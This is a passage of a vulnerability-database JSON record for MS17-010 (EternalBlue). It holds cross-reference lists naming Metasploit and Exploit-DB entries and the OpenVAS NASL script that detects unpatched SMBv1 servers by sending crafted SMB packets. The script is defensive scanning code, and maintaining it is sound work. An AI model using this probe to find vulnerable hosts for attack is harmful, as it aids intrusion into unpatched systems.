"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": 
["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", 
"MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2019-04-30T18:21:13", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2019-04-30T18:21:13", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [], "_object_type": "robots.models.f5.F5Bulletin", "_object_types": ["robots.models.f5.F5Bulletin", "robots.models.base.Bulletin"]}], "openvas": [{"id": "OPENVAS:1361412562310810676", "hash": "7e2bc500cf9abfb39d0ff12fdc47c307", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright 
(C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-08T23:26:33", "history": [{"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "7e45f4645aadf99f1ce78fc8491436ba89940d25578ff6a36b06aa4c3d9479d5", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-08-30T19:19:53", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010_remote.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 
and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability 
to execute code on the target server, also\n could lead to information disclosure from the server.\n\n Impact Level: System\");\n\n script_tag(name:\"affected\", value:\"\n Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name : \"URL\" , value : \"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name : \"URL\" , value : \"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_resp = \"\";\nsmb_sess_andx_resp = \"\"; \nsmb_trans_resp = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! 
soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! 
smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! 
smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) + \n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 
0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42, \n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00, \n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02, \n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c, \n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. 
After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{ \n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\t\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:19:53"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "365c5063d96a4f6fe8f9af69e4ef98abe381e50d44784ebf7ac71bb624960572", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2020-06-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-05T17:28:22", "history": [], "viewCount": 54, "enchantments": {"dependencies": {"modified": "2020-06-05T17:28:22", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", 
"THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-05T17:28:22", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-05 10:05:11 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 